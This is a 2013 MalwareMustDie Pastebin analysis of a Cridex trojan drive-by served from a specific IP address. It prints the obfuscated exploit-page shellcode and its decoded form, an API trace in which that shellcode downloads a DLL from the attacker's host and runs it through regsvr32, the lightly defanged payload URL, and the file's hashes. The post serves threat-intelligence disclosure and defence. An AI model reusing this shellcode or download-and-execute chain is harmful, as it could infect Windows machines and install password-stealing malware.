SHARE
TWEET

#MalwareMustDie - Trojan PWS Win32/Cridex at 198,104,62,49

MalwareMustDie Mar 5th, 2013 242 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ======================================
  2. #MalwareMustDie! @unixfreaxjp | PoC of:
  3. Trojan PWS Win32/Cridex at 198,104,62,49
  4. ======================================
  5.  
  6. --2013-03-06 04:53:22--  h00p://198,104,62,49:8080/forum/links/column・php
  7. seconds 0・00, Connecting to 198,104,62,49:8080・・・ seconds 0・00, connected・
  8.   :
  9. GET /forum/links/column・php HTTP/1・0
  10. Host: 198,104,62,49:8080
  11. Accept-Charset: ISO-8859-1,utf-8;q=0・7,*;q=0・7
  12. HTTP request sent, awaiting response・・・
  13.   :
  14. HTTP/1・1 200 OK
  15. Server: nginx/1・0・4
  16. Date: Tue, 05 Mar 2013 19:53:01 GMT
  17. Content-Type: text/html; charset=CP-1251
  18. Connection: close
  19. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  20. Vary: Accept-Encoding
  21. 200 OK
  22. Length: unspecified [text/html]
  23. Saving to: `column・php'
  24. 2013-03-06 04:53:26 (108 KB/s) - `column・php' saved [156809]
  25.  
  26. // decoded it first・・・
  27. // and see the shellcode・・・・
  28.  
  29.    :
  30. function getShellCode(){
  31.   var a = "
  32. 8200!%6482!%1551!%e004!%51c5!%c4e5!%34e0!%5191!%e0c4!%9174!%2421!%2191!%b191!%3421!%2191!%
  33. 9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%95d4!%e5e0!%21a1!%b181!%7421!%2191!%
  34. a1e5!%5421!%5191!%24e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%
  35. 70e4!%0181!%0181!%1121!%60c1!%e1a1!%c160!%9181!%0160!%9111!%7070!%8521!%c5c5!%8504!%2370!%
  36. 15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%
  37. 8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%
  38. c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%
  39. 2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%
  40. 7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%
  41. 42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%
  42. d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%
  43. 8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%
  44. 8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%
  45. e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%
  46. 58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%
  47. c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%
  48. e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%
  49. 042e!%0382!%ef08!%9eb0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%"・split("")・  reverse()・join("");
  50.   return a["replace"](/\%!/g, "%" + "u")};
  51.  
  52. // crackz!・・
  53. // output・・・shellcode!
  54.  
  55. var a ="%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0be9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1119%u0610%u1819%u061c%u1a1e%u1c06%u1211%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u4b07%u4447%u455d%u0646%u4058%u1758%u4e42%u1915%u1245%u5e1a%u1912%u1247%u181b%u1a12%u0e5e%u4d59%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u4c0e%u1915%u0e43%u5e4c%u5c15%u400e%u1551%u2846%u0028";
  56. document・write(a);
  57.  
  58. // translate API of shellcode・・・
  59.  
  60. 0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  61. 0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
  62. 0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  63. 0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://198,104,62,49:8080/forum/links/column・php?jf=1m:2v:1o:30:2v&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&dv=t&hy=n, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
  64. 0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  65. 0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0) 
  66. 0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)
  67.  
  68. //payload url:
  69.  
  70. h00p://198,104,62,49:8080/forum/links/column・php?jf=1m:2v:1o:30:2v&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&dv=t&hy=n
  71.  
  72. // fetch it・・・
  73.  
  74. --2013-03-06 05:04:11--  h00p://198,104,62,49:8080/forum/links/column・php?jf=1m:2v:1o:30:2v&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&dv=t&hy=n
  75. seconds 0・00, Connecting to 198,104,62,49:8080・・・ seconds 0・00, connected・
  76.   :
  77. GET /forum/links/column・php?jf=1m:2v:1o:30:2v&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&dv=t&hy=n HTTP/1・0
  78. Host: 198,104,62,49:8080
  79. HTTP request sent, awaiting response・・・
  80.   :
  81. HTTP/1・1 200 OK
  82. Server: nginx/1・0・4
  83. Date: Tue, 05 Mar 2013 20:03:49 GMT
  84. Content-Type: application/x-msdownload
  85. Connection: keep-alive
  86. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  87. Pragma: public
  88. Expires: Tue, 05 Mar 2013 20:03:51 GMT
  89. Cache-Control: must-revalidate, post-check=0, pre-check=0
  90. Cache-Control: private
  91. Content-Disposition: attachment; filename="about・exe"
  92. Content-Transfer-Encoding: binary
  93. Content-Length: 102400
  94. 200 OK
  95. Length: 102400 (100K) [application/x-msdownload]
  96. Saving to: `about・exe'
  97. 2013-03-06 05:04:15 (84・8 KB/s) - `about・exe' saved [102400/102400]
  98.  
  99. Download snapshot: http://urlquery.net/report.php?id=1270484
  100.  
  101. // file info:
  102.  
  103. 2013/03/06  05:04  102,400 about・exe 31de2e1b48a8341c3732b97e61712a56
  104.  
  105. Same as:
  106.  
  107. // Virus Total check・・・
  108.  
  109. URL: https://www・virustotal・com/en/file/a7a2e20afb5d04ea9798e21559d6cbbe575785d6d9d00c0693ae90a299d8d405/analysis/1362504075/
  110. SHA256: a7a2e20afb5d04ea9798e21559d6cbbe575785d6d9d00c0693ae90a299d8d405
  111. SHA1: 014fe37cd0b08936b54dabb2d44ca0901f741184
  112. MD5: 31de2e1b48a8341c3732b97e61712a56
  113. File size: 100・0 KB ( 102400 bytes )
  114. File name: docprop・dll
  115. File type: Win32 EXE
  116. Tags: peexe
  117. Detection ratio: 2 / 46 <========== VERY LOW!!!
  118. Analysis date: 2013-03-05 17:08:27 UTC ( 14 minutes ago )
  119.  
  120. Fortinet      : W32/Kryptik・ALRY!tr
  121. Kaspersky   : UDS:DangerousObject・Multi・Generic
  122.  
  123.  
  124. ----
  125. #MalwareMustDie!!
  126. @unixfreaxjp
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top